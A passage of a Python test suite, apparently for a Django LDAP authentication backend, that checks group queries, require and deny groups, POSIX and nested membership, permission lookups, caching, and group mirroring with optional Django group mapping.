self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test") & LDAPGroupQuery(
"cn=mutual_gon,ou=query_groups,o=test"
)
self.assertIs(query.resolve(alice.ldap_user), True)
self.assertIs(query.resolve(bob.ldap_user), False)
def test_nested_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
query = (
LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test")
& LDAPGroupQuery("cn=mutual_gon,ou=query_groups,o=test")
) | LDAPGroupQuery("cn=bob_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(alice.ldap_user), True)
self.assertIs(query.resolve(bob.ldap_user), True)
def test_require_group_as_group_query(self):
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test") & LDAPGroupQuery(
"cn=mutual_gon,ou=query_groups,o=test"
)
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
REQUIRE_GROUP=query,
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNotNone(alice)
self.assertIsNone(bob)
def test_group_union(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearchUnion(
LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
LDAPSearch(
"ou=moregroups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
REQUIRE_GROUP="cn=other_gon,ou=moregroups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNone(alice)
self.assertIsNotNone(bob)
self.assertEqual(bob.ldap_user.group_names, {"other_gon"})
def test_nested_group_union(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearchUnion(
LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
LDAPSearch(
"ou=moregroups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
),
GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
REQUIRE_GROUP="cn=other_gon,ou=moregroups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNone(alice)
self.assertIsNotNone(bob)
self.assertEqual(bob.ldap_user.group_names, {"other_gon"})
def test_denied_group(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
DENY_GROUP="cn=active_gon,ou=groups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNone(alice)
self.assertIsNotNone(bob)
def test_group_dns(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
self.assertEqual(
alice.ldap_user.group_dns,
{
"cn=active_gon,ou=groups,o=test",
"cn=staff_gon,ou=groups,o=test",
"cn=superuser_gon,ou=groups,o=test",
"cn=nested_gon,ou=groups,o=test",
},
)
def test_group_names(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
self.assertEqual(
alice.ldap_user.group_names,
{"active_gon", "staff_gon", "superuser_gon", "nested_gon"},
)
def test_dn_group_membership(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
USER_FLAGS_BY_GROUP={
"is_active": LDAPGroupQuery("cn=active_gon,ou=groups,o=test"),
"is_staff": [
"cn=empty_gon,ou=groups,o=test",
"cn=staff_gon,ou=groups,o=test",
],
"is_superuser": "cn=superuser_gon,ou=groups,o=test",
},
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIs(alice.is_active, True)
self.assertIs(alice.is_staff, True)
self.assertIs(alice.is_superuser, True)
self.assertIs(bob.is_active, False)
self.assertIs(bob.is_staff, False)
self.assertIs(bob.is_superuser, False)
def test_user_flags_misconfigured(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
USER_FLAGS_BY_GROUP={
"is_active": LDAPGroupQuery("cn=active_gon,ou=groups,o=test"),
"is_staff": [],
"is_superuser": "cn=superuser_gon,ou=groups,o=test",
},
)
with self.assertRaises(ImproperlyConfigured):
authenticate(username="alice", password="password")
def test_posix_membership(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=PosixGroupType(),
USER_FLAGS_BY_GROUP={
"is_active": "cn=active_px,ou=groups,o=test",
"is_staff": "cn=staff_px,ou=groups,o=test",
"is_superuser": "cn=superuser_px,ou=groups,o=test",
},
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIs(alice.is_active, True)
self.assertIs(alice.is_staff, True)
self.assertIs(alice.is_superuser, True)
self.assertIs(bob.is_active, False)
self.assertIs(bob.is_staff, False)
self.assertIs(bob.is_superuser, False)
def test_nested_dn_group_membership(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
USER_FLAGS_BY_GROUP={
"is_active": "cn=parent_gon,ou=groups,o=test",
"is_staff": "cn=parent_gon,ou=groups,o=test",
},
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIs(alice.is_active, True)
self.assertIs(alice.is_staff, True)
self.assertIs(bob.is_active, False)
self.assertIs(bob.is_staff, False)
def test_posix_missing_attributes(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=PosixGroupType(),
USER_FLAGS_BY_GROUP={"is_active": "cn=active_px,ou=groups,o=test"},
)
nobody = authenticate(username="nobody", password="password")
self.assertIs(nobody.is_active, False)
def test_dn_group_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
)
self._init_groups()
backend = get_backend()
alice = User.objects.create(username="alice")
alice = backend.get_user(alice.pk)
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
)
self.assertEqual(
backend.get_all_permissions(alice), {"auth.add_user", "auth.change_user"}
)
self.assertIs(backend.has_perm(alice, "auth.add_user"), True)
self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_mapping_dn_group_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
USE_GROUP_MAPPING=True
)
self._init_groups_with_mapping()
backend = get_backend()
alice = User.objects.create(username="alice")
alice = backend.get_user(alice.pk)
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
)
self.assertEqual(
backend.get_all_permissions(alice), {"auth.add_group", "auth.delete_user"}
)
self.assertIs(backend.has_perm(alice, "auth.add_group"), True)
self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_group_permissions_ldap_error(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
)
self._init_groups()
backend = get_backend()
alice = User.objects.create(username="alice")
alice = backend.get_user(alice.pk)
self.assertEqual(backend.get_group_permissions(alice), set())
def test_mapping_group_permissions_ldap_error(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
USE_GROUP_MAPPING=True
)
self._init_groups_with_mapping()
backend = get_backend()
alice = User.objects.create(username="alice")
alice = backend.get_user(alice.pk)
self.assertEqual(backend.get_group_permissions(alice), set())
def test_empty_group_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
)
self._init_groups()
backend = get_backend()
bob = User.objects.create(username="bob")
bob = backend.get_user(bob.pk)
self.assertEqual(backend.get_group_permissions(bob), set())
self.assertEqual(backend.get_all_permissions(bob), set())
self.assertIs(backend.has_perm(bob, "auth.add_user"), False)
self.assertIs(backend.has_module_perms(bob, "auth"), False)
def test_mapping_empty_group_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
USE_GROUP_MAPPING=True
)
self._init_groups_with_mapping()
backend = get_backend()
bob = User.objects.create(username="bob")
bob = backend.get_user(bob.pk)
self.assertEqual(backend.get_group_permissions(bob), set())
self.assertEqual(backend.get_all_permissions(bob), set())
self.assertIs(backend.has_perm(bob, "auth.add_group"), False)
self.assertIs(backend.has_module_perms(bob, "auth"), False)
def test_posix_group_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
),
GROUP_TYPE=PosixGroupType(),
FIND_GROUP_PERMS=True,
)
self._init_groups()
backend = get_backend()
alice = User.objects.create(username="alice")
alice = backend.get_user(alice.pk)
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
)
self.assertEqual(
backend.get_all_permissions(alice), {"auth.add_user", "auth.change_user"}
)
self.assertIs(backend.has_perm(alice, "auth.add_user"), True)
self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_mapping_posix_group_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
),
GROUP_TYPE=PosixGroupType(),
FIND_GROUP_PERMS=True,
USE_GROUP_MAPPING=True,
)
self._init_groups_with_mapping()
backend = get_backend()
alice = User.objects.create(username="alice")
alice = backend.get_user(alice.pk)
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
)
self.assertEqual(
backend.get_all_permissions(alice), {"auth.add_group", "auth.delete_user"}
)
self.assertIs(backend.has_perm(alice, "auth.add_group"), True)
self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_posix_group_permissions_no_gid(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
),
GROUP_TYPE=PosixGroupType(),
FIND_GROUP_PERMS=True,
)
self._init_groups()
backend = get_backend()
nonposix = User.objects.create(username="nonposix")
nonposix = backend.get_user(nonposix.pk)
self.assertEqual(
backend.get_group_permissions(nonposix),
{"auth.add_user", "auth.change_user"},
)
self.assertEqual(
backend.get_all_permissions(nonposix), {"auth.add_user", "auth.change_user"}
)
self.assertIs(backend.has_perm(nonposix, "auth.add_user"), True)
self.assertIs(backend.has_module_perms(nonposix, "auth"), True)
def test_mapping_posix_group_permissions_no_gid(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
),
GROUP_TYPE=PosixGroupType(),
FIND_GROUP_PERMS=True,
USE_GROUP_MAPPING=True,
)
self._init_groups_with_mapping()
backend = get_backend()
nonposix = User.objects.create(username="nonposix")
nonposix = backend.get_user(nonposix.pk)
self.assertEqual(
backend.get_group_permissions(nonposix),
{"auth.add_group", "auth.delete_user"},
)
self.assertEqual(
backend.get_all_permissions(nonposix), {"auth.add_group", "auth.delete_user"}
)
self.assertIs(backend.has_perm(nonposix, "auth.delete_user"), True)
self.assertIs(backend.has_module_perms(nonposix, "auth"), True)
def test_foreign_user_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
)
self._init_groups()
backend = get_backend()
alice = User.objects.create(username="alice")
self.assertEqual(backend.get_group_permissions(alice), set())
def test_mapping_foreign_user_permissions(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
USE_GROUP_MAPPING=True,
)
self._init_groups_with_mapping()
backend = get_backend()
alice = User.objects.create(username="alice")
self.assertEqual(backend.get_group_permissions(alice), set())
@spy_ldap("search_s")
def test_group_cache(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
CACHE_TIMEOUT=3600,
)
self._init_groups()
backend = get_backend()
alice_id = User.objects.create(username="alice").pk
bob_id = User.objects.create(username="bob").pk
# Check permissions twice for each user
for i in range(2):
alice = backend.get_user(alice_id)
self.assertEqual(
backend.get_group_permissions(alice),
{"auth.add_user", "auth.change_user"},
)
bob = backend.get_user(bob_id)
self.assertEqual(backend.get_group_permissions(bob), set())
# Should have executed one LDAP search per user
self.assertEqual(mock.call_count, 2)
@spy_ldap("search_s")
def test_mapping_group_cache(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
CACHE_TIMEOUT=3600,
USE_GROUP_MAPPING=True,
)
self._init_groups_with_mapping()
backend = get_backend()
alice_id = User.objects.create(username="alice").pk
bob_id = User.objects.create(username="bob").pk
# Check permissions twice for each user
for i in range(2):
alice = backend.get_user(alice_id)
self.assertEqual(
backend.get_group_permissions(alice),
{"auth.add_group", "auth.delete_user"},
)
bob = backend.get_user(bob_id)
self.assertEqual(backend.get_group_permissions(bob), set())
# Should have executed one LDAP search per user
self.assertEqual(mock.call_count, 2)
def test_group_mirroring(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
),
GROUP_TYPE=PosixGroupType(),
MIRROR_GROUPS=True,
)
self.assertEqual(Group.objects.count(), 0)
alice = authenticate(username="alice", password="password")
self.assertEqual(Group.objects.count(), 3)
self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))
def test_mapping_group_mirroring_empty_mapping(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
),
GROUP_TYPE=PosixGroupType(),
MIRROR_GROUPS=True,
USE_GROUP_MAPPING=True,
)
self.assertEqual(Group.objects.count(), 0)
alice = authenticate(username="alice", password="password")
self.assertEqual(Group.objects.count(), 0)
self.assertEqual(alice.groups.count(), 0)
def test_mapping_group_mirroring_nonempty_mapping(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=posixGroup)"
),
GROUP_TYPE=PosixGroupType(),
MIRROR_GROUPS=True,
USE_GROUP_MAPPING=True,
)
self.assertEqual(Group.objects.count(), 0)
GroupMapping.objects.create(django_group=Group.objects.create(name="django_active_px"),
ldap_group_name="active_px")
GroupMapping.objects.create(django_group=Group.objects.create(name="django_staff_px"), ldap_group_name="staff_px")
Group.objects.create(name="non-ldap-group")
alice = authenticate(username="alice", password="password")
self.assertEqual(alice.groups.count(), 2)
self.assertEqual(
set(alice.groups.all().values_list("name", flat=True)),
{"django_active_px", "django_staff_px"}
)
def test_nested_group_mirroring(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
MIRROR_GROUPS=True,
)
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(Group.objects.all().values_list("name", flat=True)),
{
"active_gon",
"staff_gon",
"superuser_gon",
"nested_gon",
"parent_gon",
"circular_gon",
},
)
self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))
def test_mapping_nested_group_mirroring_empty_mapping(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
MIRROR_GROUPS=True,
USE_GROUP_MAPPING=True,
)
Group.objects.create(name="django_active_gon")
Group.objects.create(name="django_staff_gon")
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(Group.objects.all().values_list("name", flat=True)),
{"django_active_gon", "django_staff_gon"},
)
self.assertEqual(set(alice.groups.all()), set())
def test_mapping_nested_group_mirroring_full_mapping(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
MIRROR_GROUPS=True,
USE_GROUP_MAPPING=True,
)
active = Group.objects.create(name="django_active_gon")
staff = Group.objects.create(name="django_staff_gon")
superuser = Group.objects.create(name="django_superuser_gon")
nested = Group.objects.create(name="django_nested_gon")
parent = Group.objects.create(name="django_parent_gon")
circular = Group.objects.create(name="django_circular_gon")
GroupMapping.objects.create(django_group=active, ldap_group_name="active_gon")
GroupMapping.objects.create(django_group=staff, ldap_group_name="staff_gon")
GroupMapping.objects.create(django_group=superuser, ldap_group_name="superuser_gon")
GroupMapping.objects.create(django_group=nested, ldap_group_name="nested_gon")
GroupMapping.objects.create(django_group=parent, ldap_group_name="parent_gon")
GroupMapping.objects.create(django_group=circular, ldap_group_name="circular_gon")
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(Group.objects.all().values_list("name", flat=True)),
{
"django_active_gon",
"django_staff_gon",
"django_superuser_gon",
"django_nested_gon",
"django_parent_gon",
"django_circular_gon",
},
)
self.assertEqual(set(alice.groups.all()), set(Group.objects.all()))
def test_mapping_nested_group_mirroring_partial_mapping(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
MIRROR_GROUPS=True,
USE_GROUP_MAPPING=True,
)
active = Group.objects.create(name="django_active_gon")
staff = Group.objects.create(name="django_staff_gon")
not_mapped = Group.objects.create(name="superuser_gon")
GroupMapping.objects.create(django_group=active, ldap_group_name="active_gon")
GroupMapping.objects.create(django_group=staff, ldap_group_name="staff_gon")
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(Group.objects.all().values_list("name", flat=True)),
{
"django_active_gon",
"django_staff_gon",
"superuser_gon",
},
)
self.assertEqual(
set(alice.groups.all().values_list("name", flat=True)),
{"django_active_gon", "django_staff_gon"}
)
# Group mapping forbid use of groups white/black-list. Instead mapping works as whitelist and django groups should
# be created beforehand
def test_mapping_group_no_group_whitelist(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS=["mirror1", "mirror2"],
USE_GROUP_MAPPING=True
)
backend = get_backend()
with self.assertRaises(ImproperlyConfigured):
alice = backend.populate_user("alice")
def test_mapping_group_no_group_blacklist(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS_EXCEPT=["mirror1", "mirror2"],
USE_GROUP_MAPPING=True
)
backend = get_backend()
with self.assertRaises(ImproperlyConfigured):
alice = backend.populate_user("alice")
def test_mapping_group_mirroring_whitelist_update(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS=True,
USE_GROUP_MAPPING=True
)
backend = get_backend()
groups = {}
# Create mapped groups
for i in range(1, 5):
django_name = "group{0}".format(i)
ldap_name = "mirror{0}".format(i)
groups[django_name] = Group.objects.create(name=django_name)
GroupMapping.objects.create(django_group=groups[django_name], ldap_group_name=ldap_name)
# Create unmapped group
groups["group5"] = Group.objects.create(name="group5")
alice = backend.populate_user("alice")
alice.groups.set([groups["group2"], groups["group4"], groups["group5"]])
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(alice.groups.values_list("name", flat=True)), {"group1", "group3", "group5"}
)
def test_mapping_group_mirroring_whitelist_noop(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS=True,
USE_GROUP_MAPPING=True
)
backend = get_backend()
groups = {}
# Create mapped groups
for i in range(1, 5):
django_name = "group{0}".format(i)
ldap_name = "mirror{0}".format(i)
groups[django_name] = Group.objects.create(name=django_name)
if i in (1, 3):
GroupMapping.objects.create(django_group=groups[django_name], ldap_group_name=ldap_name)
# Create unmapped group
groups["group5"] = Group.objects.create(name="group5")
alice = backend.populate_user("alice")
alice.groups.set([groups["group1"], groups["group3"], groups["group4"], groups["group5"]])
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(alice.groups.values_list("name", flat=True)), {"group1", "group3", "group4", "group5"}
)
#
# When selectively mirroring groups, there are eight scenarios for any
# given user/group pair:
#
# (is-member-in-LDAP, not-member-in-LDAP)
# x (is-member-in-Django, not-member-in-Django)
# x (synced, not-synced)
#
# The four test cases below take these scenarios four at a time for each of
# the two settings.
def test_group_mirroring_whitelist_update(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS=["mirror1", "mirror2"],
)
backend = get_backend()
groups = {}
for name in ("mirror{}".format(i) for i in range(1, 5)):
groups[name] = Group.objects.create(name=name)
alice = backend.populate_user("alice")
alice.groups.set([groups["mirror2"], groups["mirror4"]])
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(alice.groups.values_list("name", flat=True)), {"mirror1", "mirror4"}
)
def test_group_mirroring_whitelist_noop(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS=["mirror1", "mirror2"],
)
backend = get_backend()
groups = {}
for name in ("mirror{}".format(i) for i in range(1, 5)):
groups[name] = Group.objects.create(name=name)
alice = backend.populate_user("alice")
alice.groups.set([groups["mirror1"], groups["mirror3"]])
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(alice.groups.values_list("name", flat=True)), {"mirror1", "mirror3"}
)
def test_group_mirroring_blacklist_update(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS_EXCEPT=["mirror1", "mirror2"],
)
backend = get_backend()
groups = {}
for name in ("mirror{}".format(i) for i in range(1, 5)):
groups[name] = Group.objects.create(name=name)
alice = backend.populate_user("alice")
alice.groups.set([groups["mirror2"], groups["mirror4"]])
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(alice.groups.values_list("name", flat=True)), {"mirror2", "mirror3"}
)
def test_group_mirroring_blacklist_noop(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=mirror_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=GroupOfNamesType(),
MIRROR_GROUPS_EXCEPT=["mirror1", "mirror2"],
)
backend = get_backend()
groups = {}
for name in ("mirror{}".format(i) for i in range(1, 5)):
groups[name] = Group.objects.create(name=name)
alice = backend.populate_user("alice")
alice.groups.set([groups["mirror1"], groups["mirror3"]])
alice = authenticate(username="alice", password="password")
self.assertEqual(
set(alice.groups.values_list("name", flat=True)), {"mirror1", "mirror3"}
)
def test_authorize_external_users(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
AUTHORIZE_ALL_USERS=True,
)
self._init_groups()
backend = get_backend()
alice = User.objects.create(username="alice")
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
)
def test_mapping_authorize_external_users(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
FIND_GROUP_PERMS=True,
AUTHORIZE_ALL_USERS=True,
USE_GROUP_MAPPING=True
)
self._init_groups_with_mapping()
backend = get_backend()
alice = User.objects.create(username="alice")
self.assertEqual(
backend.get_group_permissions(alice), {"auth.add_group", "auth.delete_user"}
)
def test_authorize_external_unknown(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
